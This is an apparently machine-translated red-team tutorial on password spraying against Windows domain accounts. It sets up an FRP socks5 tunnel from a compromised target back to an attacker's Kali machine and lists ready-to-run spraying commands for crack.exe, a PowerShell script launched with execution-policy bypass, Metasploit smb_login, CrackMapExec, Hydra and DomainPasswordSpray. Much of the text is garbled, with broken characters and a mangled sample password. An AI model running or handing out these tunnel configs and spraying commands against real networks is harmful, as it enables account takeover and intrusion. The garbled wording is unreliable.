** Welcome to my WeChat official account. 《 The soul in the shell 》**

Password spray attack is a kind of automatic attack , In order to avoid account locking caused by password explosion for only one user , Password spray attack is to blast all users , It avoids users being locked , At the same time, it also improves the efficiency of users' password cracking . meanwhile , Different from the fixed user name, the password is exploded , Password spray attack is to blow up the user name with a fixed password .

Establish communication tunnel

⼀ Like our red team ⼈ Member and ⽬ Within standard ⽹ build ⽴ 了 socks5 After tunnel , You can from outside （ this ⾥ It means the red team ⼈ Members ⼈ PC） Enter... For the machines in the domain ⾏ Information has been collected , quite a lot ⼯ It's not ⽤ Upload to ⽬ Standard machine , It is not easy to be AV detected , But it may be ⼀ Some flow detection equipment found that there was ⼤ The amount socks5 Traffic

Use Proxifier and FRP Conduct socks5 Establishment of tunnel

First of all, now attack the aircraft kali Establish a listening Tunnel

[common]
bind_port = 7000 

And then on the target machine frpc, And connect to kali, At the same time open socks5 service

[common]
server_addr = 192.168.137.93    //kali Of IP
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

Finally, use the attacker win7, adopt proxifier Connect socks5

crack Domain introgression ⾏ Code spray （ Download link not found ）

crack yes ⼀ paragraph ⾮ have the hobby of doing sth. ⽤ Password spray ⼯ have , And fast ,⽀ Hold right ⼀ individual C、 B Segregating ⾏ be based on smb Code spray . Command syntax

 Based on a single ⽤ A single password of the user 
crack.exe -i 10.10.10.10/24 -p 445 -U redteam\saulgoodman -P [email protected]#45 -s smb -t 100
 be based on ⽤ User dictionary password dictionary 
crack.exe -i 10.10.10.10/24 -p 445 -U user.txt -P pass.txt -s smb -t 100

Successful spraying will be in the current path ⽣ become ⼀ individual result.txt ⽂ Pieces of ,⾥⾯ Is the result of successful spraying

Invoke-DomainPasswordSprayOutsideTheDomain（ Domain introgression ⾏ Code spray ）

Invoke-DomainPasswordSprayOutsideTheDomain The script is 3gstudent Written ⼀ Script .

Download address ： https://github.com/3gstudent/Homework-of-Powershell

send ⽤ Single password

powershell -exec bypass
Import-Module .\Invoke-DomainPasswordSprayOutsideTheDomain.ps1
Invoke-DomainPasswordSprayOutsideTheDomain -UserList users.txt -Domain "10.10.10.10/DC=redteam,DC=com" -Password [email protected]#45

send ⽤ password ⽂ Pieces of

Invoke-DomainPasswordSprayOutsideTheDomain -UserList users.txt -Domain "10.10.10.10/DC=redteam,DC=com" -Password [email protected]#45 

this ⾥ It is suggested that ⽤ Single password to enter ⾏ Code spray , If it is ⼀ A password dictionary may report an error

Use msf Password spraying

First, configure the proxy

setg proxies socks5:192.168.137.54:7777
setg ReverseAllowProxy true

Using modules

scanner/smb/smb_login 

You can configure file dictionary explosion

set user_file /root/users.txt
set pass_file /root/pass.txt

If you are blasting a domain, set the domain

set smbdomain redteam 

In case of blasting of the working group

set smbdomain . 

However, I always show that I can't connect. I don't know why

Super weak ⼝ Make ⼯ With a pair of domain introgression ⾏ Code spray

Super weak ⼝ Order inspection ⼯ Yes ⼀ paragraph Windows The weakness of the platform ⼝ Make the audit ⼯ have ,⽀ Hold batch multithreading check , Weak passwords can be found quickly 、 weak ⼝ Make the account number , password ⽀ Hold and ⽤ The account name is combined into ⾏ Check ,⼤⼤ carry ⾼ The success rate ,⽀ a ⾃ Define the server ⼝ And the dictionary . ⼯ With talent ⽤C# Development , Need to install .NET Framework 4.0,⼯ have ⽬ front ⽀ a SSH、 RDP、 SMB、 MySQL、 SQLServer、 Oracle、 FTP、 MongoDB、Memcached、 PostgreSQL、 Telnet、 SMTP、 SMTP_SSL、 POP3、 POP3_SSL、 IMAP、 IMAP_SSL、 SVN、VNC、 Redis And so on ⼝ Order inspection ⼯ do .

Download address ： https://github.com/shack2/SNETCracker

CrackMapExec Domain introgression ⾏ Code spray

CrackMapExec（⼜ name CME） yes ⼀ paragraph ⾮ have the hobby of doing sth. ⽤ Password spray attack ⼯ have , stay Kali Linux It is installed by default .

Download address ： https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb 10.10.10.12 -u users.txt -p '[email protected]#45' --continue-on-success 

Hydra Domain introgression ⾏ Code spray

Hydra Is the most famous violent ⼒ Crack ⼯ With it ⼀, I'll be here ⾥ in the light of SMB agreement , But this is ⼯ have ⼏ Can almost make ⽤ Any other protocol to complete password spraying

hydra -L users.txt -p [email protected]#45 10.10.10.12 smb 

Use DomainPasswordSpray

Tools to address ：https://github.com/dafthack/DomainPasswordSpray

DomainPasswordSpray Yes, it is PowerShell Tools for writing , Used for password spraying attacks on domain users . By default , It will take advantage of LDAP Export user list from domain , And then take out the locked users , Then use the fixed password to spray the password .

First from powershell Import script , And then it runs again

You can see the results

Of course, we can do it in the form of a dictionary

Invoke-DomainPasswordSpray -UserList users.txt -Domain g1ts.com -PasswordList passlist.txt -OutFile sprayed-creds.txt 

• UserList： User dictionary
• Password： Single password
• PasswordList： Password dictionary
• OutFile： Output file name
• Domain： The domain to be exploded
• Force： Forced spraying continues , Without prompting for confirmation .